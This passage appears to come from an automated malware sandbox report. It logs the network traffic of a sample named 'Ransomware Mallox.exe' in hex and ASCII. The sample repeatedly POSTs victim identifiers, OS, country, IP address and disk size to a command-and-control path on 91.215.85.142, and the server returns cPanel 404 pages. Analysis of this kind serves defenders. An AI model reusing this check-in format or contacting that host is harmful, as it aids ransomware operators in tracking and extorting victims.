                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:28.270253897 CET212INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; }
                    Nov 5, 2024 13:23:28.270766973 CET1236INData Raw: 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                    Data Ascii: .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additiona
                    Nov 5, 2024 13:23:28.270956039 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74
                    Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60
                    Nov 5, 2024 13:23:28.270967007 CET1236INData Raw: 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20
                    Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom
                    Nov 5, 2024 13:23:28.271835089 CET1236INData Raw: 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63
                    Data Ascii: Y38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20Yfi
                    Nov 5, 2024 13:23:28.271847010 CET1236INData Raw: 63 6b 69 51 35 5a 4f 55 7a 6c 43 4f 4d 79 69 39 5a 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39
                    Data Ascii: ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMr
                    Nov 5, 2024 13:23:28.272660017 CET1236INData Raw: 4b 59 55 49 6e 6a 70 6b 52 63 65 63 57 66 6b 45 6d 64 43 41 65 68 67 75 65 75 54 6d 4e 74 2b 73 68 6b 52 65 4b 64 33 76 36 37 6e 50 39 63 4e 44 4a 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55
                    Data Ascii: KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94
                    Nov 5, 2024 13:23:28.272672892 CET1236INData Raw: 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20
                    Data Ascii: <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 2091.215.85.142's <a href="mailto:36root@91-215-85-142.cprapid.c
                    Nov 5, 2024 13:23:28.272685051 CET435INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26
                    Data Ascii: <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.104980291.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:29.317025900 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:30.207827091 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:30 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:30.207921982 CET212INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; }
                    Nov 5, 2024 13:23:30.208266020 CET1236INData Raw: 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                    Data Ascii: .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additiona
                    Nov 5, 2024 13:23:30.208461046 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74
                    Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60
                    Nov 5, 2024 13:23:30.208476067 CET1236INData Raw: 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20
                    Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom
                    Nov 5, 2024 13:23:30.209033966 CET1236INData Raw: 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63
                    Data Ascii: Y38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20Yfi
                    Nov 5, 2024 13:23:30.209048986 CET848INData Raw: 63 6b 69 51 35 5a 4f 55 7a 6c 43 4f 4d 79 69 39 5a 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39
                    Data Ascii: ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMr
                    Nov 5, 2024 13:23:30.209060907 CET1236INData Raw: 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d 41 6e 76 37 54 68 30 50 77 50 37 34 70 54 6c 39 55 6a 50 5a 38 47 6a 31 39 50 59 53 6e 30 53 31 46 51 47 32 56 66 47 76 53 50 71 78 72 70 35 32 6d 42 4e 36
                    Data Ascii: r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y
                    Nov 5, 2024 13:23:30.209841013 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: width: 70%; } .status-code { font-size: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body>
                    Nov 5, 2024 13:23:30.209857941 CET424INData Raw: 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 64 0d 0a 39 31 2e 32 31 35 2e 38 35 2e 31 34 32 0d 0a 31 39 0d 0a 2f
                    Data Ascii: iv class="info-heading"> d91.215.85.14219/QWEwqdsvsf/ap.php (port 28073) </div> </li> <li class="info-server">107</
                    Nov 5, 2024 13:23:30.213175058 CET399INData Raw: 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 0d 0a
                    Data Ascii: l.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." />


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.104980891.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:30.564204931 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:31.452996016 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:31 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:31.453157902 CET1236INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reas
                    Nov 5, 2024 13:23:31.453169107 CET1236INData Raw: 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a
                    Data Ascii: align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left;
                    Nov 5, 2024 13:23:31.453639030 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20
                    Data Ascii: } .reason-text { font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-head
                    Nov 5, 2024 13:23:31.453651905 CET1236INData Raw: 70 68 79 42 74 4e 48 78 48 51 6d 44 47 67 42 76 5a 6a 58 42 75 57 4e 32 67 6f 67 62 50 79 36 52 74 63 4f 65 6a 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f
                    Data Ascii: phyBtNHxHQmDGgBvZjXBuWN2gogbPy6RtcOejNPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2
                    Nov 5, 2024 13:23:31.453663111 CET1060INData Raw: 43 77 54 42 75 38 57 33 30 73 53 49 69 53 37 50 39 4e 77 5a 37 43 67 41 65 44 6a 6c 61 4d 39 6b 74 41 44 30 2b 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70
                    Data Ascii: CwTBu8W30sSIiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4Q
                    Nov 5, 2024 13:23:31.454468012 CET1236INData Raw: 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d 41 6e 76 37 54 68 30 50 77 50 37 34 70 54 6c 39 55 6a 50 5a 38 47 6a 31 39 50 59 53 6e 30 53 31 46 51 47 32 56 66 47 76 53 50 71 78 72 70 35 32 6d 42 4e 36
                    Data Ascii: r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y
                    Nov 5, 2024 13:23:31.454484940 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: width: 70%; } .status-code { font-size: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body>
                    Nov 5, 2024 13:23:31.454497099 CET424INData Raw: 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 64 0d 0a 39 31 2e 32 31 35 2e 38 35 2e 31 34 32 0d 0a 31 39 0d 0a 2f
                    Data Ascii: iv class="info-heading"> d91.215.85.14219/QWEwqdsvsf/ap.php (port 28073) </div> </li> <li class="info-server">107</
                    Nov 5, 2024 13:23:31.454916954 CET399INData Raw: 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 0d 0a
                    Data Ascii: l.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." />


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.104981991.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:31.668910027 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
